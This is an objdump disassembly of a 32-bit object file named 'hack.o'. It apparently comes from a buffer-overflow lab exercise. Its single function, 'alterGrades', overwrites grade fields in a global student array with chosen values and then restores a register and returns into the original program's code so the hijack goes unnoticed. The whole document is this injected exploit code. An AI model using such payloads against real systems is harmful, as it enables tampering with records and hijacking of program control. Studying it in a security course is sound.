
hack.o:     file format elf32-i386


Disassembly of section .text:

00000000 <alterGrades>:
   0:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
   5:	c7 40 40 5a 00 00 00 	movl   $0x5a,0x40(%eax)
   c:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  11:	05 90 01 00 00       	add    $0x190,%eax
  16:	c7 40 40 50 00 00 00 	movl   $0x50,0x40(%eax)
  1d:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  22:	05 20 03 00 00       	add    $0x320,%eax
  27:	c7 40 40 5a 00 00 00 	movl   $0x5a,0x40(%eax)
  2e:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  33:	05 b0 04 00 00       	add    $0x4b0,%eax
  38:	c7 40 40 64 00 00 00 	movl   $0x64,0x40(%eax)
  3f:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  44:	05 40 06 00 00       	add    $0x640,%eax
  49:	c7 40 40 09 00 00 00 	movl   $0x9,0x40(%eax)
  50:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  55:	05 d0 07 00 00       	add    $0x7d0,%eax
  5a:	c7 40 40 09 00 00 00 	movl   $0x9,0x40(%eax)
  61:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  66:	05 60 09 00 00       	add    $0x960,%eax
  6b:	c7 40 40 09 00 00 00 	movl   $0x9,0x40(%eax)
  72:	c7 45 fc 07 00 00 00 	movl   $0x7,-0x4(%ebp)
  79:	8b 45 fc             	mov    -0x4(%ebp),%eax
  7c:	69 d0 90 01 00 00    	imul   $0x190,%eax,%edx
  82:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  87:	01 d0                	add    %edx,%eax
  89:	c7 40 40 09 00 00 00 	movl   $0x9,0x40(%eax)
  90:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  95:	05 80 0c 00 00       	add    $0xc80,%eax
  9a:	c7 40 40 5f 00 00 00 	movl   $0x5f,0x40(%eax)
  a1:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  a6:	05 10 0e 00 00       	add    $0xe10,%eax
  ab:	c7 40 40 5f 00 00 00 	movl   $0x5f,0x40(%eax)
  b2:	b8 c0 c8 04 08       	mov    $0x804c8c0,%eax
  b7:	05 a0 0f 00 00       	add    $0xfa0,%eax
  bc:	c7 40 40 5d 00 00 00 	movl   $0x5d,0x40(%eax)
  c3:	bb f4 af 70 55       	mov    $0x5570aff4,%ebx
  c8:	68 92 87 04 08       	push   $0x8048792
  cd:	c3                   	ret    
